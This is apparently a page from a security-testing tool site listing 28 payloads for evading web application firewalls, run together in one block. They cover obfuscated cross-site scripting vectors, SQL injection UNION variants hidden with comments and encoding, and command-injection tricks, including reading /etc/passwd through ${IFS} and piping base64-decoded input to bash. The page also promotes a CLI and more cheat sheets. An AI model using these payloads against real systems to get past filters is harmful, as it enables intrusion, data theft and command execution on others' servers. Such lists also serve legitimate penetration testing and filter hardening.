$loading...
WAF evasion techniques for XSS, SQLi, RCE, and LFI payloads using encoding, comments, and alternative syntax. (28 payloads)
<svg/onload=alert(1)><img src=x oNeRrOr=alert(1)><script>alert`1`</script><script>\u0061lert(1)</script><script>eval(atob("YWxlcnQoMSk="))</script><img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><svg><animate onbegin=alert(1) attributeName=x></svg><math><mtext><table><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">' /*!UNION*/ /*!SELECT*/ 1,2,3--'/**/UNION/**/SELECT/**/1,2,3--' uNiOn SeLeCt 1,2,3--' UN%49ON SEL%45CT 1,2,3--' UNION%0ASELECT%0A1,2,3--' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--' UniOn(SeLeCt(1),(2),(3))--' UNION ALL SELECT 1,2,3--w'h'o'a'm'iw\h\o\a\m\i/???/??t /???/??????cat${IFS}/etc/passwd{echo,$(whoami)}$(printf '\x69\x64')base64 -d <<< "aWQ=" | bash$0<<<$'\x69\x64'Double URL encode: %253Cscript%253EUnicode normalization: <script>alert(1)</script>HTML entities in JS context: alert(1)Overlong UTF-8: %C0%BCscript%C0%BELevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides